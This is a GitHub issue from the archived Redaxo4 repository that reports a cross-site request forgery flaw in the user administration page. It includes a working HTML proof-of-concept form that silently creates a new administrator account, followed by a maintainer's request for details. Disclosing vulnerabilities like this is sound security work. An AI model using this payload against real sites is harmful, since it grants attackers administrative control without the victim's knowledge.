Skip to content
This repository has been archived by the owner on Jan 1, 2020. It is now read-only.

There is a CSRF vulnerability that can add an administrator #420

Closed
riyir opened this issue Aug 11, 2018 · 1 comment
Closed

There is a CSRF vulnerability that can add an administrator #420

riyir opened this issue Aug 11, 2018 · 1 comment

Comments

@riyir
Copy link

riyir commented Aug 11, 2018

  • After administrator log in, there is a CSRF vulnerability that can add an administrator via /redaxo4-master/redaxo/index.php?page=user
  • poc
  • csrf.html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.98.61/redaxo4-master/redaxo/index.php" method="POST">
      <input type="hidden" name="page" value="user" />
      <input type="hidden" name="save" value="1" />
      <input type="hidden" name="FUNC&#95;ADD" value="1" />
      <input type="hidden" name="userlogin" value="bbb" />
      <input type="hidden" name="userpsw" value="bbbbbb" />
      <input type="hidden" name="username" value="Administrator" />
      <input type="hidden" name="userdesc" value="bbbbbb" />
      <input type="hidden" name="useradmin" value="1" />
      <input type="hidden" name="userstatus" value="1" />
      <input type="hidden" name="userperm&#95;sprachen&#91;&#93;" value="0" />
      <input type="hidden" name="userperm&#95;be&#95;sprache" value="" />
      <input type="hidden" name="userperm&#95;startpage" value="" />
      <input type="hidden" name="function" value="æ&#183;&#187;å&#138;&#160;ç&#148;&#168;æ&#136;&#183;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

@staabm
Copy link
Member

staabm commented Aug 16, 2018

thank you for the report.

could you describe a bit further how exactly (using which parameter) the vulnerability materializes?

which Redaxo4 version do you use?

@gharlan gharlan closed this as completed Jan 1, 2020
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants